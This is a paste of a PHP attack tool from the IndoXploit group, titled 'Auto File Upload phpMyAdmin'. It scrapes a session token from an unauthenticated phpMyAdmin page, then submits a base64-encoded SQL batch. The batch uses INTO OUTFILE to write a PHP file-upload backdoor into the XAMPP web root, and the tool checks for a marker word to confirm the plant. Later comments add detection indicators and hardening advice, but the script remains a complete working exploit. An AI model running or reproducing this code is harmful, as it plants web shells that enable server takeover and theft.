Ribang

phpmyadmin upload file

Dec 12th, 2017
<html>
<!--
  Operator-facing form for the PHP script that follows. It POSTs back to the
  same page (empty action) with two fields: `urls` (the textarea) and `submit`.
  The form is declared multipart/form-data but contains no file input.
-->
<center><h1>Auto File Upload phpMyAdmin</h1>
<form method="post" action="" enctype="multipart/form-data">
<textarea placeholder="Enter Target Url !" style="padding: 5px; resize: none; width: 400px; height: 200px; border: solid 1px #006400;" name="urls"></textarea><br>
<input type="submit" name="submit" value="Submit" style="margin: 5px auto; hight: 25px; width: 200px;">

</form><center></html>
  8.  
<?php
//Tu5b0l3d
//Auto upload uploader in phpmyadmin
//
// Analyst notes (annotations are written for detection and hardening):
// the script takes a base URL from the form field `urls` and sends requests to
// fixed phpMyAdmin paths beneath it. The fixed paths and the probe filename
// assigned below are literal strings, so they appear verbatim in the web
// access log of any host the tool was pointed at.
cover();              // prints the banner; the function is defined further down in this file
error_reporting(0);   // silences all PHP warnings/notices, including the undefined index on a plain GET
set_time_limit(0);    // removes the script execution time limit
$site = $_POST['urls'];               // taken straight from the request: no isset() check, no URL validation
$sql = "phpmyadmin/import.php";       // path that later receives the SQL POST
$sql2 = "phpmyadmin/server_sql.php";  // page fetched first so the form token can be scraped from it
$file = "dhcteam.php";                // filename requested at the end as the success check
  19.  
/**
 * Fetch "$url/$dir" with an HTTP GET and return the response body.
 *
 * Detection notes: every request made through this helper carries the same
 * hard-coded, dated Firefox 32 User-Agent string, and the cookie file
 * `coker_log` is created in the script's working directory. Both are stable
 * artefacts to search for in proxy/web logs and on a host that ran the tool.
 *
 * @param string $url  base URL, used as given (no validation in this function)
 * @param string $dir  path appended after a single "/"
 * @return string|false response body, or false when curl_exec() fails
 */
function anuu($url, $dir){
 $ch1 = curl_init("$url/$dir");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);   // return the body instead of printing it
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);   // follow HTTP redirects
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);   // give up connecting after 5 seconds
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);   // certificate chain is not verified
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);   // certificate host name is not checked
// Same file is used as cookie source and cookie store, so cookies set by one
// request are available to later requests that use the same file name.
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
// The handle is never closed with curl_close() in this function.
return $data;
}
  33.  
  34. function ambilKata($param, $kata1, $kata2){
  35.         if(strpos($param, $kata1) === FALSE) return FALSE;
  36.         if(strpos($param, $kata2) === FALSE) return FALSE;
  37.         $start = strpos($param, $kata1) + strlen($kata1);
  38.         $end = strpos($param, $kata2, $start);
  39.         $return = substr($param, $start, $end - $start);
  40.         return $return;
  41. }
  42.  
  43. function cover(){
  44.                     if(isset($_POST['submit']))
  45.         echo "\n\n\t############# IndoXploit #############\n";
  46.         echo "\t#########  Thx To: HNc, IBT  #########\n\n";
  47. }
  48.  
/**
 * POST a set of form fields, including a token and an SQL string, to "$urlq/$path"
 * and return the response body.
 *
 * The field names mirror a phpMyAdmin SQL query form (`token`, `sql_query`,
 * `sql_delimiter`, `goto`, ...). No user name or password is sent by this
 * function; the only session material is whatever cookies are in `coker_log`.
 *
 * Hardening notes: a phpMyAdmin instance that demands a login before issuing
 * a usable token, is not reachable from untrusted networks, and connects with
 * a database account lacking the FILE privilege does not give this request
 * anything to work with.
 *
 * @param string $urlq   base URL, used as given
 * @param string $path   path appended after a single "/"
 * @param string $toket  value sent as the `token` field
 * @param string $shell  value sent as the `sql_query` field
 * @return string|false  response body, or false when curl_exec() fails
 */
function upload22($urlq, $path, $toket, $shell){
                $post = array(
                                        "is_js_confirmed" => "0",
                                        "token" => "$toket",
                                        "pos" => "0",
                                        "goto" => "server_sql.php",
                                        "zero_rows" => "Your SQL query has been executed successfully",
                                        "sql_query" => "$shell",
                                        "bkm_label" => "",
                                        "bkm_all_users" => "",
                                        "bkm_replace" => "true",
                                        "sql_delimiter" => ";",
                                        "show_query" => "1",
                                        "SQL" => "Go",
                                        );
$ch = curl_init ("$urlq/$path");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);   // return the body instead of printing it
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);   // follow HTTP redirects
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);   // certificate chain is not verified
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);   // certificate host name is not checked
curl_setopt ($ch, CURLOPT_POST, 1);
// $post is passed as an array, so cURL sends it as multipart/form-data.
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
// Same cookie file name as the GET helper in this script uses.
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data6 = curl_exec ($ch);
// The handle is never closed with curl_close() in this function.
return $data6;
}
  77.  
  78.  
// Main flow. It runs on every page load, not only after the form is submitted.
//
// Step 1: fetch the SQL page and scrape the hidden form token out of the HTML.
// `ambilkata` resolves to ambilKata() because PHP function names are
// case-insensitive. No credentials are submitted anywhere in this flow, so the
// tool presumably only gets a valid token from an instance that serves an
// authenticated session without a login; confirm against the target's
// phpMyAdmin auth configuration.
$toket = anuu($site, $sql2);
$toket_asli = ambilkata($toket,"name=\"token\" value=\"","\" />");


// Step 2: the SQL batch, stored base64-encoded. Decoded, it contains (CRLF-separated):
//   - `use mysql;`
//   - drop/create of a one-column scratch table named `temptab`
//   - an INSERT whose single value is an HTML page with an embedded PHP block
//     that copies an uploaded file to the name supplied by the client; the page
//     text includes the marker word "ganteng"
//   - `SELECT * INTO OUTFILE 'C:/xampp/htdocs/n.php' from temptab;`
//   - `DROP TABLE temptab;` and `FLUSH LOGS;`
// Indicators for responders: a file `n.php` in a XAMPP htdocs directory, a
// `temptab` table in the `mysql` schema, `INTO OUTFILE` in query logs, and the
// marker word above in a served page.
// Hardening: INTO OUTFILE needs the FILE privilege and is confined by
// `secure_file_priv`; the database service account should not be able to write
// into the web root.
$shell = base64_decode("dXNlIG15c3FsOw0KRFJPUCBUQUJMRSBJRiBFWElTVFMgYHRlbXB0YWJgOw0KQ1JFQVRFIFRBQkxFIHRlbXB0YWIgKGNvZGV0YWIgdGV4dCk7DQpJTlNFUlQgSU5UTyB0ZW1wdGFiIChjb2RldGFiKSBWQUxVRVMgKA0KJzx0aXRsZT5VcGxvYWQgRmlsZTwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSx0ZCx0aCB7DQpjb2xvcjogIzBGMDsNCn0NCmJvZHkgew0KYmFja2dyb3VuZC1jb2xvcjogIzk5OTsNCn0NCi0tPg0KPC9zdHlsZT48cD5nYW50ZW5nDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiA+DQo8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgLz4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+DQo8L2Zvcm0+DQo8cD4NCjxzdHJvbmc+DQo8P3BocA0KaWYgKCRfRklMRVNbImZpbGUiXSAhPSAiIikgew0KY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSBvciBkaWUgKCJQcm9zZXMgdXBsb2FkIEdhZ2FsOiAiKTsNCn1lbHNlIHsNCmRpZSgiU2lsYWhrYW4gcGlsaWggZmlsZSIpOw0KfQ0KPz4NCkZpbGUgYmVyaGFzaWwgZGl1cGxvYWQ6PGJyIC8+DQpLZXRlcmFuZ2FuIEZpbGU6PGJyIC8+DQpOYW1hIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07ID8+PGJyIC8+DQpVa3VyYW4gRmlsZTogPD9waHAgZWNobyAkX0ZJTEVTWyJmaWxlIl1bInNpemUiXTs/PiBCeXRlcyA8YnIgLz4NCkplbmlzIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJ0eXBlIl07ID8+PC9zdHJvbmc+PC9wPg0KDQonDQopOw0KU0VMRUNUICogSU5UTyBPVVRGSUxFICdDOi94YW1wcC9odGRvY3Mvbi5waHAnIGZyb20gdGVtcHRhYjsNCkRST1AgVEFCTEUgdGVtcHRhYjsNCkZMVVNIIExPR1M7DQo=");
// Step 3: submit the batch; the response body is stored but never inspected.
$upload = upload22($site, $sql, $toket_asli, $shell);
// Step 4: request "$site/$file" and look for the marker word, case-insensitively.
// The name requested here comes from $file, while the decoded batch writes
// `n.php`; both names are worth searching for in access logs.
$files = anuu($site, $file);
if(preg_match("#ganteng#i",$files)){
                // Message is Indonesian for "uploader planted successfully".
                echo "# Berhasil Nanem Uploader\n$site/$file\n\n";
}
else{
        // Indonesian for "failed".
        echo "# Gagal~\n";


}



?>